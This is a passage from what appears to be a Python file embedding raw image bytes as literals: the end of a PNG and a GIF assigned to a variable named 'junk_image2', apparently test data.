\x86\xe12\xe7\xa6\xd1\x05\x1d\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b:tA\x17tA\x17tA\x17tA\x17tA\x17tA\x17tA\x17tA\x17t\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\xd0\x05]\xd0\x05]\xd0\x05}\x95A\x17tA\x17tA\x17tA\x17tA\x17tA\x17tA\x17tA\x17tA\x87.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82.\xe8\x82\x0e]\xd0\x05]\xd0\x05]\xd0\x05]\xd0\x05]\xd0\x05]\xd0\x05]\xd0\x05]\xd0\x05\x1d\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xfae\xbf\xed\xba\xed\xfe\x02\xbd\x9d\x9e\xbe\xc5G\xdd3\xf4V:^\xc7\x97\xc3\xe9t\xb8\x8e\xeb7\xe8m4~\x8d\xab\xd7\xf9\xbd\xdfW\xf1}\x82\xdeB\xe3]\xc4\xcf\\\xfe\x8a\xb8\x9f\xa0\xb7a\x1e\xa7\\\x9f#\xd5\xa1Wo~w\xf5\x17\xbd\xebS\x1dz\xe5\xe6\xe36\x0e\xf3G\x87\xd8N\xa9\x0e\xbdr\xf3y\x1f\xb7\xa7\xf9\xbd\xd3m\xec\xe7T\x87^\xb9\xf9|\xe9\xe3\xc7\xe1|>\xdc\xc6\xe62\xa7:\xf4\xba\xcd\xdf;\xf6\xf1Q\x7f\x9c\xe7*\xd5\xa1\x17\xe6y\r{\xdfu\xf7y\r[\xb1:\xf44/jN=\xd1\x99W\xa7\x0e\xbd0\xa7\x9e\xe8\xccS}\x07}\xfd\xbd\x0e7\xb1\xb0\x9b\xe1\x15\xfa\x1a{I\xf2\xa5\xec/\xd0W\xd8\x10\x0fo\xf3\xc2\xde\x1eb\x80\xbe\xc2n"\xcd\x97\xa9G\x07}\x85E\xfc\xb7\xaf\xa1C\x87\x0e\x1d:t\xe8\xd0\xa1C\x87\x0e\x1d:\xf4\x05A\x7f\xde\x8d\xf3\xa7\xc6\xddS\xc5\xe8\xd0w\xd1\x7fR\x1f\xfb\xd8U\x8c\x0e}\xecS\xbd\xdc\xaa\x18\x1d\xfag\xe2)7*F\x87\x9e\xea\xa5y\xd5\xe8\xd0\x0b\xf54\xaf\x1a\x1dz\xa1\x9e\xe6\xf5\xa3CO\xf5\xc2\xbcrt\xe8\xa9^\x98W\x8e\x0e=\xd5\xd3\xbc\rt\xe8\xa9\xbe\xd9\xa4y+\xe8\xd0\xe7q\x13\xb1\x19\xe7\x96\xd0\xa1O\xcd\xa1C\x9fZ\xfb\xbdC\xcfs\xfb\xd8\xd2A\x0e\xfa\x94\xdc\xa9^3:\xf4\xd2\xbcP\xaf\x10\x1dzi^\xa8W\x88\x0e\xbd4/\xd4+D\x87^\x9a\x17\xea\x15\xa2C/\xcd\x0b\xf5\x9a\xd1\xa1O\r\x8cKA7\x18\t\xfd\xa9\xfa\x11h\xe8\xcb\x82\xfe\xefA\x87\x0e\x1d:t\xe8\xd0\xa1C\x87\x0e\x1d:t\xe8\x1e\x0f\x84>\xc4\xe3b\xf5\xe3c\x0c\xd0=\x08\x0c}\x1d\xeaC\x17\x0b\xeb\x86\x17O\x7f\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0\x0b\xba\xa0C\x17tA\x17tA\x17tA\x17tA\x17\xf4?\xec\x98\xa1\xaf\xf48\x0c\xc4\xff\xec\xe1\xc6\xc1\xc5\xa6\xa1\x81\xa1f\x85\x81\x85f\x81afs\xdf\x97\xb6\xbb\x01OO\xba\xb7\xf7\xa4\x03\x1d\xb0\x91\x93\x19\xbb\xd2O\xa9\xb4}\xc9O1<f\x1d\x83_\xa8w~\xab\x11\xfc^\xc3\xf9\xa1F\xacM\x86\xff\xbc\xef\x03\x1d\xa7\xe8\xf0Yg\xe1\x17R%W\xb9\x91\xab$\xf3{\x19\xf8\xa1$\xafM\x0c\x9f\xf4}n\xfa\x8e\xdd\xfd\x05\xbd\x1f_C\xff\x9e\xe1\xd1\x7f\x1d\xfa\xd1\x1f\xe8\xff\x9dN\xdc\x8ecW\x0b6%\x8f\xac{\xcc\xb3Z\x8f\\:\xa9\xea%O[\xd1=\xd8\x12\xb43v-\xce\xcbG\xee\x9a\x1b\xa7\xb4\xb5\\\x06W\x83\xe1Uv\xf59\x89\xbdhk\xca\x99<\xe6\xbe\xcd\x061;\x85\x1e$\xf3N/Z\xc7\x1ca G\x9dM\x0c\xbd\xfc\r\x19\xee\xfcO\xf4@O\xb5\xa0\xd2@G\xb6\xad\x9c\xf8D-\xc98W\x04wd\x93\x14\xae\xb0\x11I,c?}JC59\xa9CJ\x15\xe5j0\xdc\xe55\xc98$Y\x16\x90E\xac\xa2\xd1!\xdb\xcc\xe7d\x8aFU\xf2\x80w\x94*i\x8e\x98M\xd4\x12\x06\r\x9b)\x0e\xda;\xff\x13=7\x9d\xdc\x94\x06\x1a\x06\x19\'\xcc\x8d\x0c\xa9s=\xe0!\x85\x1c0\x1ax\xda\x8a\xc4\x05]\xb7\xb8BD%+\xb8\x1a\xec]\xde\x93\xaa\x8ci\xebpr\x17:vNu\xce\xf3\x86\xc1\x92fy\xc0O\xe8\xb3\x8a\xf9\x001\x9f\xce\xde\xf9\x1f\xe8\x81\xee\xf7m\x1a\t[\xbd\xa0\xebET\xa7\xe3\xb4N\xd7\\\xe6\xe6\xe5;\x04zQ\x83\x91\x86\xd5\xb0\x96\xf7\xa4Y\x1bhP\xd5\xed\xdc\x9fj\x82\xb2)C,dg(R}C\xaf\x10\x9b\xd0gx\xcd\xf3\x03=\xd0\x19G\x95\xed\r}\xcb7\xf4\x8eF2\xe5\xe9\xca\x89dC\xbf}\xa3\x15\xd4\x05\xfajX\xcb{R\xde\xce\xfd\x1d\x87\xffQ\xdc\xd0\x07\x8c#)Y\xd2y\xd9\x07\xed\x05\xbd\xc1\xe97\xf4*k\x9e\x1f\xe8\x81\xde\xf7`\x95\x13\xba8w\xb4\x1b:5uV8\r\x11\x8e\xca\x9e\x94\x17\xf4v\x90[^\xa1/\x86\xb5\xbc\'5\x18\xfb\x06\x0e)\xc1c\xf9\xffp\xbd\xfe\xd9\x912\x99\xb7\xf5\xf5\xbe#\x18\x13\xfaN\x97B{\xe7?\xd1\x03\xbd\t\x80v\xc2\xdc6\xa0\xf0\x05}( ;\xe9@\xe5.\x80\x8e\x1bz\x05 }\x85\xbe\x18\xd6\xf2\x9e\xc4\x02\xa4\x0c\xf2\x10@\xda\x0b:\x0bT\x93\x92\xdcp\x90]\x92\xea\x0bzl\xa2yB/\xc0\x16\xb4w\xfe_\xe8\x81\x1e\x1e\xf7o\xef\x1cN\xb2{\xf0\x86\xd9\x07\xe7\xc1\xe5\x1b~\x86\xe6\xe2c\xfdb\xe7N\xf2\xde\x1e\xaba)\xdf\x93\x18\xc3Y\x84wr\xee\xdf\xe6\xde\xdf\xb3|\x84\xc7\xfb\xd9:}p8\xc7\xdb2\xf3\x0f\xf4\xcfuC\xff5\xb9T+0\xfe\xcf\xf4@\xaf\x95\xbf\xa7\x96_\x9fs\xfei\x8f\x0e\x04\x00\x00\x00\x18\x06\xf9[\xdf\xe3+\x85\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91.\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#]:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG\xfa\x1f\xe9HG:\xd2\xa5#\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4KG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9H\x97\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91.\x1d\xe9HG:\xd2\x91\x8et\xa4#\x1d\xe9HG:\xd2\x91\x8et\xa4#]:9\x03\x02\xfe\xb5\xf0\xbfX`~\x00\x00\x00\x00IEND\xaeB`\x82'
junk_image2 = b'GIF87a\xf4\x01v\x01\xf4\x1f\x00UUU\xff\x0b\x89\x01d\xdc)))\xff\xff\xff\xab\xcc\xf4\x06\x06\x06\xcf\xe2\xf8\xff\x94\xcb\x81\xb2\xee\xbe\xd7\xf6\xeb\xf3\xfc\xff\xbe\xdf\xff\xf7\xfb\xdc\xea\xfa\xf4\xf9\xfe\xff\xfa\xfd\xf1\xf6\xfd\xf9\xfb\xfe\xff\xee\xf7\xfe\xfd\xfe\xcc\xcc\xccDDD\xbb\xbb\xbb\x88\x88\x88\xdd\xdd\xddfff\x99\x99\x99\xee\xee\xee\xaa\xaa\xaawwwV\x98\xe8!\xff\x0bXMP DataXMPD?xpacke</rdf:Description> </rdf:RDF> </:xmpmeta> <?xpacket end="r"?>\x00,\x00\x00\x00\x00\xf4\x01v\x01\x00\x05\xff`%\x8edi\x9eh\xaa\xael\xeb\xbep,\xcftm\xdfx\xae\xef|\xef\xff%\x82pH,\x1a\x8f\xc8\xa4r\xc9l:\x9f\xd0\xa8tJ\xadZ\xaf\xd8\xacv\xcb\xedz\xbfB\x11xL.\x9b\xcf\xe8\xb4z\xcdn\xbb\x89\xe2\xb7|N\xaf\xdb\xef\xf8\xbc>\\\xd9\xfb\xff\x80\x81\x82\x83\x84^q\x85\x88\x89\x8a\x8b\x8c\x8dd\x87\x8e\x91\x92\x93\x94\x95\x82\x90\x96\x99\x9a\x9b\x9c\x9dW\x98\x9e\xa1\xa2\xa3\xa4\x93\xa0\xa5\xa8\xa9\xaa\xabs\xa7\xac\xaf\xb0\xb1\xb2U\xae\xb3\xb6\xb7\xb8\xb2\xb5\xb9\xbc\xbd\xbe\x9b\xbb\xbf\xc2\xc3\xc4\x84\xc1\xc5\xc8\xc9\xcao\xc7\xcb\xce\xcf\xd0\\\xcd\xd1\xd4\xd5\xd6K\xd3\xd7\xda\xdb\xd4\xd9\xdc\xdf\xe0\xc4\xde\xe1\xe4\xe5\xb6\xe3\xe6\xe9\xea\xa8\xe8\xeb\xee\xef\x9a\xed\xf0\xf3\xf4\x8c\xf2\xf5\xf8\xf9\x80\xf7\xfa\xfd\xfet\xfc\xfe\t\x1c\x88& \xc1\x83\x08\xa5\xf5I\xc8\xb0\xe1\x1a\x83\x0e#JL\x02q\xa2E\x8b\x15/jl\x98q\xa3G\x82\x1d?\x8a\xec\x17r\xa4Iz%O\xff\xaa\\\x97r\xa5Kr-_\xca\xdc\x16s\xa6\xcdn\x0bo\xea\xfcWs\xa7\xcfb=om\xb0@\xb4(\x01\x0f9\x85XX\xb2TOS"O\x9fD}\x98\x81\xc0\x86\rm\x96V\xf0\x80d\xea\xd6|Ame\xb8pa\x00\x06\xb2\x04,\\(\xb2VI\xdb<o\x87\x18\xa0\x10%\xee\x1a\xb5\x040`h\xb3\xf6\xc2T\xb9t\x87\xf8\x05\x9bt\x1d^\xa5\x1b4X\xd8\x9bWH\x07\xa2\x1d\x8a\xec\xcdp\xd5\x82\x07\x0e\x8a#\x13\xa8\xa0\x18\xc0B\x0c\x164tX\xcb\x01\xb4\x86\xaaDJ\x87\xae\x9a\xa1\x83\x06\x00\xa8+h\xce[:Lf\x03B.\x00\xb0\x80\x95\x80\xea\xd3\x92\x1dC.\xc2\xc1Ch\x0e\x8d\x85l\xc8\xd0\xfaus\xd8\x19\x14c@N\xd64\x87\xb2\xa7\xf5\xca\x16B\x99\x08Z\x02\xdd1T\xd8\xad\x99\xb3\x05\xcf\xb4\xc3D\xee\xb0[\x03\xf2\xbd\x83\t\xb0?N\xc1\xc0c\r}\xe2\xeb\xe6\xfd.,\xae\xc3i\xd9\xd7\x81}\x04\xcc\x95\x81\x80\x06\xa0&\xc4\xff\\\x17\x18p\xd6\x00\x03l0`\x06\x1c8x\x01\x06\x03P\x80\xe1\x85\x0eR\x00\x00\x00\x1c"7\xc4y!6\x88Ao\xe0e\x98b}\x14T\x88A\x07\x03\xccU\x81\x01\x1b\x94\xb5\x17\x89\x18\x18 \xe2\x82\x14\x1c\xd8\xc1\x84Pip\x81b\x05\x06\xa6\x96\x895:\xb8\x01\x07f\r\xb9\x14\x86\x0f\n9@v\x18d\xa0\xa2\x07\x8c\t\xa1WnK\x19\x00b\x8e\x14Z\x88!\x05\x1a\xf4Vf\x83\xa3\x01\xa0A\x91\x83\xa1\xa9\xdb\x9a\x06\x0c\xd0A\x8e\xd7iE\xa3\x8d\xee\xf8w\x0b\x80\xfc\xe5\x85A}\x9b\xc9\t\x1e\x11\x80\x96E\x80\x86\\\xa5u\x01\x07\x91\xf58\xd7\x00U\x91Y\xe5\x00C\x94)D\x8f\x94\nqf\xa6D\x08\xea\x81\x07\x80&\xc6\x1dn\x96\xa6he\xa5(\x02Z\x81\xa0\nb:\xc4\x06\x80*EV\xa6\x86Z\xb5\xe6\xa1\x90bp\xab_\x14\xe0\xb5\xa5\x9c\x14\x0c\x90\xd4\x96\x04\xf0\x9a\xe0\xa1j1z\xe8\x81\xf2eX!\x07c)gA\xa1KEk\xd5\xff\xb4\xc7\x12p\xe6R\xa5\x9e\xcaRa\xea\xf0\xd9\xd6\x96s\x1de\x80\x01\xee\x11\xc1\xe0\xb4~\xca\x9a\x97\x05q\xceU\xae\x9f\r\x9e{\xee\x9f\\\x06\xa6W|D\xe8J\x80\xb0,\x12[$\xbc\xf6\x1a\xc0\xab\x96Y\x16i.\xba;\x1e\x0c\x98\xac\xfa5\x95c\xc1\x1726\x98\xaf{\xe9\xba\xaa\x04\xfdZ\xdc\xa5\x91k\x81\x16/]\tn\x00@\x8b\x1a\xc48\x00\xb6\x14\x0c\x86\x99\xca,#|q\xc1\xf3\xa6\xa3\xa7-\xe2"\x1ckU0fI-\xc2\xb2n0\xc0\x05\x14H\x80\x9b\x8eB`\xb9*\x05L+\x18h\xa5g\xfdU\xa1\xa1\x80b\xc0U\x8bs\x01\xd0\x01\xd3=\xae\n\xf5\x10;7\x9b\xa5\xd7\x8eU8"YM\r\x86(\xd7U\x11{q\xc8\x939\x98\xe8\x10nc{\xb6\xd0D\x1b\x9d4\x06\x00`\xa5\x01~-\xdb=\xd8\xdf\x15\x04^\x9f\x88X\xf2\xaa5\xdby\x82\x9bN\xce\xed\xce%4r\x00$\xbc.\xd0\x8a\xf2\xed\x9b\x06s\xfd\xbd\x99\x83\xffN6t\xff`\xa1\x17\x9b \xbfD\x00`\x16\xc9\x98\x12\xcd9\x05B\xb7\xbd\x94Y\xa6;-\xf9\x00\x94\'L{\x83\x15\xaegp\xc4\xa3\xf6\xa5c\xddiEF,\x84v\x81\xc6\x01\x07D)\x9c9\x00\x9b\x97\xbb*n\x04T\x9e\xe2\xc7\x83Yoe\x97\x1a\xb4\x0c\xe9`\xb1\xbf\xdb\xf8<\x90\xeb\x15\xab\x07\xe7\xdez)n\xf1\x11\x9b,\xc1\xe8S\x08@\x9c\x95SP\x01\xc1\t\xdb\x0f\xaf\xa0\xa8\xbfz,\xa0\x14\x80\x91\x01\xd0\xa7\xa5sY\xa0p\xf7\x8b\xd3l\x0eE=\xf4\xa1\x8bP\t\x14\x94\xd0\x06x\xa4\xb4=E\x80\x82\xaa\x9b\x86hD\xac\rP/5\xf33\x8b\xddd\xc5\xbcs\xc5O\x08S:\xd4\xf4\x06\xe0\x81\x0c\xb1oZ+la}\xd0\xc7?\x89\x19\xb0\x0f\x02\x83\x89\xe3\xf4\xc1\xb4K\xf5\x90P\xa4sB\x078\xc0\xb4R-\x81kO\xe8!\xd3$\x80D\xb0\x011\x88\x87\nL\x13\x8b\xd0\xc4)&\x81kP\x04b\xbf\xd4G\xc5\x1f\xfe\x10\nX\xc4\xe2\x13\xc3hE\xffB\xf5g\x872\x81\x12\xe7v\xf4\x8b\x0c\x80\xe9\'\xb4@\xa3L\xe64\x1dd\x9c\x05\x8eq\xc4\xa3\x1e\xcf\xb8\xc7>\xdaL\x8e~\x0cd4n&\xc8B\x86\x82\x90\x86Ld<\x00\xa9\xc8F\xfa\x02\x91\x8e\x8cd# )\xc9J"\x82\x92\x96\xccd 0\xa9\xc9N\xea\x81\x93\x9e\x0ce\x1d@)\xcaR\xba\x81\x94\xa6Le\x1aP\xa9\xcaV>\x82\x91\xae\x8c\xe5"X)\xcbZf\x81\x96\xb6\xcc%\x15p\xa9\xcb^>\x81\x97\xbe\x0c\xa6\x12\x80)\xccb\x16\x81\x98\xc6L&2\x93Y\xcce23\x98\xce|f/\xa3iI6\xb2Q\x9aG\xa0\xe6:8\xd0\x9b\x8a\xe9\xe5\x8e~\xaa\xd2\x06\xbey"\xba\xf5\x85\x9c(\x02\xe7\x85\x8c@\x96v\x92\xa50\xa5\x1a\xcf\x10\xae\xe3\xcezB\x8b\x9c\xf8\xac\x12x\xf2\xa9\x17\x14IR\x9b\xeb\x10\rx\xea\x89\x1a\xb2\x08\xe9H\xef4\'\xbd\xd0\xa6\xd0b%\x0cW\xf9l\n=\xcb2\x1a\x0b\x8cfQn$\xa7\x83\xbeI\xa1z\xb6\xffsh\xd4\x11\xd2\x85D\xda?G\x02T\x1d\x1c\xa8\\QV\x9aN\xbf\xb0t3\x16\x80\xd0b\xde\xf2\x14u>4-PlJF\xf9\xa9\xcf\x8e9\xe1)\xebt\xe8\x882yRwxs_I\x8biI\x91\x951\r|\xb3\xa6+[i\xf3 \x8a\xcf\xa7\x0c\x85(\\\xc1J\x05\xfc\xf9\xb9\xd1\x18A\xaaJ\xb9TY\x88"S\xa3X\xb2\xa8\xeb\x18\x8b;Q\xb3\x14\xa6I\xb57\x15\xc2\xdd\xbe\x18\xaa%\xbb\x14ah\xf5\xaci[\x96\xb2\x94\xa0\x86\x81\x85C\xe2\xeaS\x9a\x02T|]\xc8HD\x85%\x1c\x87\x82\x9b\xab\x16\xa57x-\x8b=\xf3\xd2\xb7\xca\xd1\xb4\xa1]\xf9*\xdd\xa2\xcaW\xa1\n\xc7\x8dkq*T\x86\x9a\x16\xc1X,K\x7fi$Z\xcd\xd1W|\x8e\x0bC)\x83\x92\xd5\xe4w\x9699U/O\xd9MQF\xa7.\xa9N5/{-\xed:\xa3c\x81\xf7\x8ckhaM\xaeU\xa3Z\xd6\xdf\xfeS\xb1x|\xd2Y\xaa\x930\xbej\x883\xffX9\xcb\x1d\xe7\xca/Ni\xc8.\x7f\x81\xaaQZ\xeb\x9b,\x81s3\x0bYi\xa2\xf4\x9a\x1b\xd4\ng\x81\x86\\-9\x98\xe4F\xce\xd2n\xa8Ka\x12c\x8c\x0b\\\xd2f\x00z\x98M\xeeh\xeb\x1a\xd6\xfc\xdc\xf4\xbcD\x98\x1bi\xabWP\xf7\xfe\x97\xc1\xaa\x85\xaeO\x1e\xa3\x9b\xe9\xba\x13\xae|u\r\xde\x14\xaa\xab\xa7\n\xa1o\xfd\xb2\x8b\x01|\xabW\xe4\xe4\xd7\xb3!^\x82\x88\xda\xea-\x87\xae\x18<\xd0\x83M\x84\x1d\xb9(\xc7\xe43\xb4\x16U\xd3\x92\xc0cQ\x02s\xb7Z\\\xeco\x82\x8d0\xb7\r\xc8\x86?\x19 \n\xb8\x8c\xbc\x04\x97\xf6\xa6\x03\xb0\xe2\xce\x05\xee\xd7\xa7\xc7\xc0\xb7\x90\xf2e\x08\x85\xb0y\x87,sY\x94^\xfe\xb2\'\xc3,fM\x92\xb9\xccg\x950\x9a\xd7<\x853\xb3\xd9\xa4j~\xb3\x9c\x99\xe0\xe69\xc77\xcev\xce\xf31\xf1\xac\xe7>\xd7\xb9\xcf}\xfc3\xa0\xf5(\xe8A\xc3\xb1\xd0\x86\xf6\t\xa2\x13\xad\x93E3\xda&\x8e~\xff\xb4L"-i\x97P\xba\xd2*\xb94\xa6M\xa2\xe9M\x8b\xa4\xd3\x9e\xf6\x08\xa8C\xad\x91Q\x93\x1a#|>\xf53M\xfd\x86\x95\n)i\xa9N\x82T\x15L\x84+k\xf6\x08\xb6fC_\x8cP\x81\xaa\\%\n_1\xc2\xaf\xe1\xe04)\x18gQ\x15\xe0\x00\x1a\x91\x82\x10V\xbb\xe1w\x17\xf0`d\x92\xed\x05hO\x19\t5C\x82]yD\x87\xce\x16\x01/\xcc\x89\x82\xb2\x8f\x90CEUA\xb2\xcaF\n\xad\xa1\xb2m\x92\xc4\x1a\x19\xb1\xfa\xabU\xaa\xf2\x1b\xd4<\xa6\xc7\xe0\x91\x0er0s\x1cB}p\x9e\xa6\xc9\x00\xec@W\xef\xe0\xc8\x072\x03\x7f\xe8c\xb4\x86\x95\x82o\x86<\x16\xdbMo\xc4C\x9e\xe4D[9<k\x0fr\xc6\xa9\x96)\xa9us\x8bYN\xbf\xc6\xd3\xe3\xee\xc8\xa7\xe2V\x03\xcde\xb0\xa3\xa0\x0e,\xa46\xc4\xad\xe3\x05\xe6\x13[\x93\'g\xe1PN\x0b\xdf\xb4f\x9b\xf3\xe4\x87=A6\x87\xb3\xdb\x90ma\xe1\xe5C!\xf2\xd1\x84\xff\xf4\xeb$m\t\xc9s\xea\xca\xe9\x97t\xe4\xc1?\xe1\x08i\x80Qz\xc9:$\x18\xfbxp)H\xa7\x93\x8b\x04h\xbf;\xd1\xceK\x1c\xb2R\x1f8\xb7\xa0\xeb\xd8\xe7M\x05\x12\x8d\xd0\xa8\x94\x16!\xcd\x8fhr\x99\xfaX\xfa\x8a \x0e=\xc8\x03,\x7f\xd5\xad\x12\xc3t"\xe5\xc8\xb6Mz\n\x83\xbc>\xe2\x00I\xc8`.\xbaP\x86\x0e\x9f\xebp\x0c}\r\xf1\x96\x95ZZ\\\xa6UE\xc6\xd7\xb7\n\xd6\x7f=@!6\xd6\xa7`\xae\xd2\x14\xac\x0c\xc4)#\xaa\x8aU\x0c,B\xa9\x86\xc2\xf9\xab\xdc\x8aY\xddra\xa4\xd4b\xbe\x95U@7\x03\x95\xd6\xe1\x90\x057oI\x00\xb9\xeb\xdb=CKu\x017\xeejZ\x00\xc2\x1ar\xe4$*\\\xb9\xf1j\xbc\x8a\x0f\xa0f\xcf\xd7\xde\x10\xbeQ\xcc\xb2\xda<.\xbf\x86\xa2\xfb\x85,4\xfb\x93\x03\xdd31{MYe\xf05\x00\x13\xb9\xe60r\x19\x0es\xdc^?r\xb2}\x98\xf3\xa7_`sA0\xf6\xc2"\xff\xb2\xb2*I\x86%X\xb290C\x80\xe6\xb6/\xec\xa2(\xa43/\x15dnt\xe31\x148\x04}\x13~4S1\\R,\x8a\xd7+m\xf16\x1d(21\xa2!7\xf5G\xea\x90y\xcc\xa2\x16K\xd34\xdc!6V\xc38\xac\x91#\xfevL\xad\xf7\'\xb8A6\xda\xe23\xd4\xc33\xab\xf3o\xd5\xa3\x19\x8f\xd1\x82=\x92\x17WS!\x1e\xb25M\x13oxa\x16/\xa2:UA8\x86\xf3A\x18\xa3\x83\xc8\x17{\x10\x03v\x9a1\x16\xc4\x03 \xc2\xa1+k\xe3\x82\xc4\xa3}\xb8\xc1s\x07W<\x8e\xd17\xa3\xa37\xe5\xa6\x0e\xe4\xa7\x06\xf3\xb2*7\xb2\x16\xb4c%\xd1\x86;\xd5S%\x06c:L\xa2U@\x98m\xa5\xd3 U\x814\xbb\x93-<29yX D\xf4*\xb8\xc3$\xb3#:\xcdg\x00kw;\xb2\xe3<x\xd1B\x8b\x02!\x1f&:\x1f\xa3\x14\xc6\xb3\x17\x11b\x15{\xf80\x8a\x02>\x90\x92R\xdf\xd4\x81\xf8\xd6[\x85s \xff\xc2S\x1a\x168#U\x81>\xb0\xd3\x88+\x93\x16\xb8c%s\x02=\x981\x17m\x88\x82\xe9pz\xe7r_j\xa1?\xf7\x924\xe9\xe3\x18\xf0g?*\x13\x17\x99\xa7B\xfb\xd3(\xf3\x93\x01\x11\xb4@\xe7\x93\x8c\x1eb\x88\x1b\x84.0\x84?\xca\x11#\x04\x94\x177\xc4\x84D\xc3;\xa5\xc3\x8cq"C\xd4\xb3A\xe3\xb4\x17\xd3\xa3T`C\x85t51\xec\xe71\xec({\x9c\x82A\x9f\xd8\x81\xdb\xe8A\x87B\x8f|\xe5@{QB\x03\x94 \xc4\xe3\x86\xef\x06ob\xd4\x04S$FK\x94E_\xf4D`#E\x11\x19E>D:_\xd4|\xca\x11t\x03\xd54\x03\xc01Nd\x91\x12\xd9Ed4\x91\xafr)\x90\xa2EJ\x90E&9\x92QT\x91f\xe4C\x1ai+\x97\xd2l\t\xa9H&\x82>\xdbV!Xr_hp\x1e\xa0\x91Zp!7\xa3\x98\x10o\xa8\r\x15\xa0\x17\xc5F\x04\x19\x85wi\xc0M\xe54\x08I\xd9S\x0cq\x94\xaa\x06\x12\xff7y\x95\xbed\x95Z\xc9\x13Y\xd9\x95\xb9\xc4\x95`\xa9\x0fb9\x96\xf8P\x96f\x89\x12_\x99\x96\xae\x84\x96l\xc9Go\xc9fn\x19\x97\x08I\x97k6\x97vY\x0ex\x99\x97\x96\xb7\x96|9f~\xf9\x97f\x16\x98\x82\x99f\x85\x89M{y\x98\xd7\x90\x98\x8aY\r\x8c\xd9\x98\x83D\x98\x90\xa9H\x8f9\x99\xceP\x99\x96\xa9\x0c\x98\x99\x99\xc8\xb0\x99U`\x1c+\xe58\xbd\xa6b\xbbqM\xbe\xd1nc0\x9a\xa3R8H\xf0\x15B\xd9fY%Xi\xc0lmp\x1d\x84\xf18\x16Vc_\x85\x9aZ\x02"\xe4v\x82d\x00 9\x97\x04m\xb2\x05\xe3\x96C\xcf\x18\x9c\xbcI\x06\xbf8>\xaceW$\x07\x1f\x1e\xf7.\x8b\xe1\x1dD\x81\x151\x07-D\xb1\x16\xd9\xc9\x94\x12\xe2s\xb9!q\xec$\x9e\x0fW\x9d\x81Gs\xd7\xc4\x1e*us\xc3A\x19\xd6\x11\x9e}Bq%\x97]\x1e \x1d\xdc\xd6\x9dC\xe0\x9e\xfdV,\xe4\xf9\x9d\t\xb3\x1f\xbd\xe1\x85\xff5\xa2\x18G\x96.\xd7\xe2\x9b\x941\x14\x97\x91\x19\xdc\xa1o\xc5r!\xc7\x91dx\x01\xa0pY\x0e^\x08QeQ#\x1e\xb7!0\x82"N\x16y\xbb!\xa1\x8bb!\xbb\xe1\x1d\x034$\x94\xd2 \x12\xe2\x93\x9f\xa3\xa1\x7f\xd2$\x11\xc2rn\xa2&&\ne#\x06(Z7\x16hG$*\xda3\xf5\xa1w\xbc\x92#\x0f\x82\x83-\xd2$D\xd2u \xc2\xa34\xd23\xb8\xf8\x1d-\x8a\'^\x08\x19\x18\x92\xa4k\x82!6\x8a~\x0f\x12!Kg\xa4\xd3\x02%,\xb7\x9d=\xca\xa2B\'\x99{B3$\xb3$\xca\xd72\xa8!Z\x15H\x93(\x94Qn\xfa/\x02\x97\x1b\x9c\xd29\xbda%\xa4\x93{\xf5\x81\xa6\xc4\xd7#m1\x14D\xc0}E\xe2y\x83\xd2 C\x00)z\x9a t1\x81`\xb8"\x92\xd3=o\x1a\x18\x86\xfa\xa6z\xba\x8a\xaa\xc7\x1d\x19\x12\xa5\xbd\xa1#\x81#\xa7\x1bY+\xe2\xa7(\x89\x11\x18\xb9\x02\xa9\x83\xb1%z\xfa-\xe6\x00\x82\xff\x0b9A\xe8\x81\x17\xe3\xa12\t\xb3%\xc4\x02\x82\xb4\xca\x18 (\x18M\x01(\x87\x11o\xbdB3V\x11#\xafJ\x1a)\x13\'Q\xd1\x7f#\xa4\x7f\xda\xa7\x16\xbd*/gs\xaa\xb8*/\xdb\xe8~\xbaz)\xcc\xda\x16\xbc\xea\x8c\x02x.\x17hn\xb1b,\xba\xda>\x8c\xc1{\x1bH<[\xd2\xac\xcei\xa1v%p\xe3\x01=MX%\x12\x90C\xb4:7\xc22\xaf\x87\xca\x9a\x1e\x08\x18f\xc8,\x18\xa8\x84=\xf2\xaf\xedjn\x84\xe3\x81\xa4c\x86\x8f\xa10<3S\x9c",\xfbz4 s\xaa\x89b6\xbe\x08*K(\x18\x0b;\x1e[\x88\x1b\x17\xba8K\x18\xa5mQ.\x83\x81u&#\xae\xb2\x12\x83Kh\xae{\xd1\xb0\xe9J\x0e\x17z 8\xe4\xae\x91!\x89\xa63\xabqC4\x18b\x84\xe0a0\x1a\xc2)\xf9\x1a{\xb1\x83\x19\\\x14>\xa0\xe1\xb2\x94\x85\x86\xdas\x8bC\x00#\x14\xb22\xa1\x82;\x1er\x164\x92\x17\x94\xf2\xb3\x7fC\x8e\xff\xa7*\x89\x98\x01*\xb8\xe1\x8a|\xd8u\xd95\xb5\xa7\xe89\x17*\xb4|\x15\x17x\xf1\xad\xdc\xe2\x1eVR#\x123\xae\x91\xf8\x8a\xe6\x9aUa\xcb\x91}\xf98\xe9\'\x8a#\xd664\xe2Aq\x02u\x98#@\x07\xd42\x0f\x04\xb8\xf8\xda\xb3\nC\x8f\xd741\x07\x84\xb7\x16\xa0\xb7F\xa622\xd4/&\xd4\x89\xeb\xe7=\xf0\xb2\xb8\xe2\xc80\x96\xc8P|\x13#\xe9R.\xfa\xe8\x1d+3b\x9f\x91>&fW\x8a\xdb\x07\x1e\xcbm.\xc39\xa0C\xb2\xe6\x16\xbac\xf8@\x88\xdb.c\x1a\x8ca\x84\x040yE\x0b9\x91e\xd4\x92V\xa0D\xb9{\x04t\xf1E?\xc4+,\xe9C\xbcK\x91\x17\tE\xc8;\x060\x9